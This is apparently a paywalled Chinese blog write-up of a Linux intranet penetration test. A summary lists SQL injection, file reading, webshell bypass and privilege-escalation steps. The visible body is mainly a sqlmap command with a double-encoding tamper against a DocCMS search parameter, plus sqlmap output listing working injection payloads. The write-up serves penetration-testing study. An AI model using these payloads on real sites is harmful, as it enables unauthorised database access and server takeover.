本文记录了一次Linux内网渗透的过程,涉及DocCMS的SQL注入漏洞利用,通过sqlmap进行 payloads 发现并尝试获取shell。在无法解密密码时,尝试了不同思路,包括利用MySQL的LOCAL INFILE漏洞读取文件。文章还讨论了在拿到webshell后如何绕过限制,使用putenv函数和bypass.so进行提权。在渗透过程中,通过LinEnum和linux-exploit-suggester收集信息,并利用宝塔面板提权。在DMZ区域的横向移动中,遇到代理不稳定问题,使用ssocks解决。最终目标是10.10.10.144,通过上传带后门的emlog模板实现进一步渗透。
欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注
启明yyds,我第一次觉得自己选对了公司,hvv估计有望了
外网打点发现web服务器有:
DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper:
sqlmap.py -u "http://网站ip/search/?keyword=123" --tamper=chardoubleencode
代码审计之_doccms2016漏洞_whojoe的博客-优快云博客
得到:current user: 'www_ddd4_com@localhost'
sqlmap identified the following injection point(s) with a total of 112 HTTP(s) requests:
---
Parameter: keyword (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: keyword=-2578' OR 4517=4517#Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: keyword=123' AND GTID_SUBSET(CONCAT(0x716a7a7671,(SELECT (ELT(8175=8175,1))),0x7178717871),8175)-- sYQNType: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=123' AND (SELECT 2008 FROM (SELECT(SLEEP(5)))ohfb)-- tUncType: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: keyword=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7671,0x5046774c4d75506444637a6f7a775852614f7751464566447363797445616a637465534857746b6d,0x7178717871),NULL,NULL,NULL,NULL#
---
[21:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:04:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL
最低0.47元/天 解锁文章
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
